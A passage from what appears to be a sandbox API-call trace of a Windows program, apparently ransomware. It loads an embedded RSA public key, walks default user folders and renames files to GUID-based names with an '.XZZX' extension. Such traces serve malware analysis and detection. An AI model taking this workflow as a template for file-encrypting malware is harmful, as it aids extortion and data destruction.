(uMode=0x1) returned 0x1 [0205.178] lstrcpyW (in: lpString1=0x2caf860, lpString2="MSNBC News.url" | out: lpString1="MSNBC News.url") returned="MSNBC News.url" [0205.178] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x6a7ed01e, Data2=0x9c90, Data3=0x4c5f, Data4=([0]=0xb2, [1]=0x98, [2]=0x33, [3]=0xff, [4]=0x81, [5]=0xf0, [6]=0x3f, [7]=0xb9))) returned 0x0 [0205.178] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url") returned 58 [0205.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0205.178] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\2E2758E02EB4D9706A7ED01E317FBDB8.XZZX") returned 81 [0205.178] StrStrW (lpFirst="MSNBC News.url", lpSrch="XZZX") returned 0x0 [0205.178] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url", dwFileAttributes=0x20) returned 0 [0205.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 807 os_tid = 0xf38 [0205.338] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.338] lstrcpyW (in: lpString1=0x2caf460, lpString2="Get Windows Live.url" | out: lpString1="Get Windows Live.url") returned="Get Windows Live.url" [0205.338] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.338] SetErrorMode (uMode=0x1) returned 0x1 [0205.338] lstrcpyW (in: lpString1=0x2caf860, lpString2="Get Windows Live.url" | out: lpString1="Get Windows Live.url") returned="Get Windows Live.url" [0205.338] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xa6748e1f, Data2=0x56fe, Data3=0x4ca8, Data4=([0]=0xba, [1]=0x26, [2]=0xc3, [3]=0xc9, [4]=0x1, [5]=0x3f, [6]=0xf5, [7]=0xd2))) returned 0x0 [0205.339] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url") returned 64 [0205.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0205.339] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\4F636CC21A0C7EB0A6748E1F1CD762F8.XZZX") returned 81 [0205.339] StrStrW (lpFirst="Get Windows Live.url", lpSrch="XZZX") returned 0x0 [0205.339] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url", dwFileAttributes=0x20) returned 0 [0205.339] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 808 os_tid = 0xf3c [0205.489] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.489] lstrcpyW (in: lpString1=0x2caf460, lpString2="Windows Live Gallery.url" | out: lpString1="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0205.489] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.489] SetErrorMode (uMode=0x1) returned 0x1 [0205.489] lstrcpyW (in: lpString1=0x2caf860, lpString2="Windows Live Gallery.url" | out: lpString1="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0205.489] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x106ffc09, Data2=0x2c49, Data3=0x4e9a, Data4=([0]=0x87, [1]=0x16, [2]=0x17, [3]=0x16, [4]=0x23, [5]=0x8f, [6]=0xc, [7]=0x9e))) returned 0x0 [0205.489] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 68 [0205.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0205.490] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\EF406A910D98E1EA106FFC091063C632.XZZX") returned 81 [0205.490] StrStrW (lpFirst="Windows Live Gallery.url", lpSrch="XZZX") returned 0x0 [0205.490] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url", dwFileAttributes=0x20) returned 0 [0205.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 809 os_tid = 0xf40 [0205.645] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.645] lstrcpyW (in: lpString1=0x2caf460, lpString2="Windows Live Mail.url" | out: lpString1="Windows Live Mail.url") returned="Windows Live Mail.url" [0205.645] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.646] SetErrorMode (uMode=0x1) returned 0x1 [0205.646] lstrcpyW (in: lpString1=0x2caf860, lpString2="Windows Live Mail.url" | out: lpString1="Windows Live Mail.url") returned="Windows Live Mail.url" [0205.646] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x9c31c9c5, Data2=0x2b03, Data3=0x417e, Data4=([0]=0x94, [1]=0x55, [2]=0x66, [3]=0xd7, [4]=0xe2, [5]=0xed, [6]=0x79, [7]=0x43))) returned 0x0 [0205.646] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url") returned 65 [0205.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0205.646] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\3179744F0B00EE7A9C31C9C50DCBD2C2.XZZX") returned 81 [0205.646] StrStrW (lpFirst="Windows Live Mail.url", lpSrch="XZZX") returned 0x0 [0205.646] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url", dwFileAttributes=0x20) returned 0 [0205.646] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 810 os_tid = 0xf44 [0205.802] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.802] lstrcpyW (in: lpString1=0x2caf460, lpString2="Windows Live Spaces.url" | out: lpString1="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0205.802] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\" [0205.802] SetErrorMode (uMode=0x1) returned 0x1 [0205.802] lstrcpyW (in: lpString1=0x2caf860, lpString2="Windows Live Spaces.url" | out: lpString1="Windows Live Spaces.url") returned="Windows Live Spaces.url" [0205.802] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xc2fac194, Data2=0x6fa0, Data3=0x4542, Data4=([0]=0x81, [1]=0xe8, [2]=0x6f, [3]=0x41, [4]=0x98, [5]=0x36, [6]=0xd5, [7]=0x9b))) returned 0x0 [0205.802] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 67 [0205.802] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0205.802] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\96A828801E32E740C2FAC19420FDCB88.XZZX") returned 81 [0205.802] StrStrW (lpFirst="Windows Live Spaces.url", lpSrch="XZZX") returned 0x0 [0205.803] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url", dwFileAttributes=0x20) returned 0 [0205.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\default\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 811 os_tid = 0xf48 [0205.979] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0205.979] lstrcpyW (in: lpString1=0x2caf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0205.979] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0205.979] SetErrorMode (uMode=0x1) returned 0x1 [0205.979] lstrcpyW (in: lpString1=0x2caf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0205.979] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x5f520248, Data2=0xce63, Data3=0x46c1, Data4=([0]=0x8a, [1]=0x4e, [2]=0xdf, [3]=0x33, [4]=0xa2, [5]=0x92, [6]=0xf6, [7]=0x6e))) returned 0x0 [0205.979] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini") returned 38 [0205.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0205.979] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\DA8CD1D8390AAAA35F5202483BD58EEB.XZZX") returned 64 [0205.979] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0205.979] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini", dwFileAttributes=0x20) returned 0 [0205.979] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\desktop.ini" (normalized: "c:\\users\\default\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 812 os_tid = 0xf4c [0206.130] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.130] lstrcpyW (in: lpString1=0x2caf460, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0206.130] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0206.130] SetErrorMode (uMode=0x1) returned 0x1 [0206.130] lstrcpyW (in: lpString1=0x2caf860, lpString2="Desktop.lnk" | out: lpString1="Desktop.lnk") returned="Desktop.lnk" [0206.130] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x7fae5a04, Data2=0x12c3, Data3=0x47e2, Data4=([0]=0x85, [1]=0xc1, [2]=0xd9, [3]=0x70, [4]=0xdb, [5]=0x7b, [6]=0x3a, [7]=0xfc))) returned 0x0 [0206.130] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk") returned 38 [0206.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0206.130] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\8422D90C0544A5267FAE5A04080F896E.XZZX") returned 64 [0206.130] StrStrW (lpFirst="Desktop.lnk", lpSrch="XZZX") returned 0x0 [0206.130] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk", dwFileAttributes=0x20) returned 0 [0206.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Desktop.lnk" (normalized: "c:\\users\\default\\links\\desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 813 os_tid = 0xf50 Thread: id = 814 os_tid = 0xf54 [0206.285] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.285] lstrcpyW (in: lpString1=0x2daf460, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0206.285] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0206.285] SetErrorMode (uMode=0x1) returned 0x1 [0206.285] lstrcpyW (in: lpString1=0x2daf860, lpString2="Downloads.lnk" | out: lpString1="Downloads.lnk") returned="Downloads.lnk" [0206.285] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x54769b69, Data2=0xac90, Data3=0x4a53, Data4=([0]=0xb2, [1]=0x98, [2]=0x84, [3]=0x96, [4]=0x28, [5]=0x8b, [6]=0xad, [7]=0xe3))) returned 0x0 [0206.285] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk") returned 40 [0206.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0206.285] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Links\\3321F710321992B054769B6934F476F8.XZZX") returned 64 [0206.285] StrStrW (lpFirst="Downloads.lnk", lpSrch="XZZX") returned 0x0 [0206.285] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk", dwFileAttributes=0x20) returned 0 [0206.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Links\\Downloads.lnk" (normalized: "c:\\users\\default\\links\\downloads.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 815 os_tid = 0xf58 [0206.441] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0206.441] lstrcpyW (in: lpString1=0x2daf460, lpString2="RecentPlaces.lnk" | out: lpString1="RecentPlaces.lnk") returned="RecentPlaces.lnk" [0206.441] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\Default\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Links\\" [0206.441] SetErrorMode (uMode=0x1) returned 0x1 [0206.441] lstrcpyW (in: lpString1=0x2daf860, 